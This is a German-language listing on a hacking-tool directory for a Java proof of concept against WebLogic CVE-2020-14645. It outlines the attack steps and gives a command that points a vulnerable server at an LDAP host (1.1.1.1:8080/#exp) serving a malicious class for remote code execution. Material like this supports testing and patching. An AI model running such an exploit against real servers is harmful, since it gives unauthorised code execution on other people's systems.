Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Weblogic_CVE-2020-14645 — Java-PoC für WebLogic CVE-2020-14645 Coherence-Deserialisierungs-RCE. Stellt eine bösartige Klasse über LDAP bereit und löst Remote-Codeausführung auf anfälligen WebLogic-Servern aus. | Kitploit
Tools/GitHubGitHub/jlvsjp/weblogic_cve-2020-14645
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsRemote-Access-ToolPayload-Entwicklung
GitHub
jlvsjp/weblogic_cve-2020-14645

Weblogic_CVE-2020-14645

Java-PoC für WebLogic CVE-2020-14645 Coherence-Deserialisierungs-RCE. Stellt eine bösartige Klasse über LDAP bereit und löst Remote-Codeausführung auf anfälligen WebLogic-Servern aus.

Repository anzeigen
16vor 6 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Weblogic CVE-2020-14645 coherence Deserialisierungs-Schwachstelle Verifikationsprogramm

Umgebung

  • Maven 3

  • JDK 1.8

Kompilierung

root@kitploit:~
mvn package

Verwendung

Die konkreten Testschritte:

  1. POC schreiben
  2. POC in eine class-Datei kompilieren
  3. Eine statische Site starten, um die kompilierte POC zu veröffentlichen
  4. Einen LDAP-Proxy starten, um die Anfragen des Testziels zum Abrufen der POC weiterzuleiten
  5. Testprogramm ausführen

Da diese Schwachstelle der Apache Dubbo Schwachstelle ähnelt, beziehen Sie sich bitte auf diese Schwachstelle, um die Schritte 1-4 umzusetzen.

Testprogramm ausführen

root@kitploit:~
java -jar target/CVE-2020-14645.jar LDAP_IP:LDAP_PORT/#CLASS_NAME WEBLOGIC_URL

# Beispiel
java -jar target/CVE-2020-14645.jar 1.1.1.1:8080/#exp http://127.0.0.1:7001
java -jar target/CVE-2020-14645.jar 1.1.1.1:8080/#exp https://127.0.0.1:7002

Wenn die in diesem Beispiel bereitgestellte POC verwendet wird, führt das getestete Ziel nach erfolgreicher Ausnutzung calc.exe aus. Bitte passen Sie die POC selbst entsprechend der Umgebung des Testziels an.

Danksagung

Dieses Projekt bezieht sich auf und zitiert Teile des Codes der Projekte @Y4er @5up3rc, wofür wir uns hiermit bedanken!

Referenzen

https://github.com/Y4er/CVE-2020-14645

https://github.com/5up3rc/weblogic_cmd

Tool herunterladen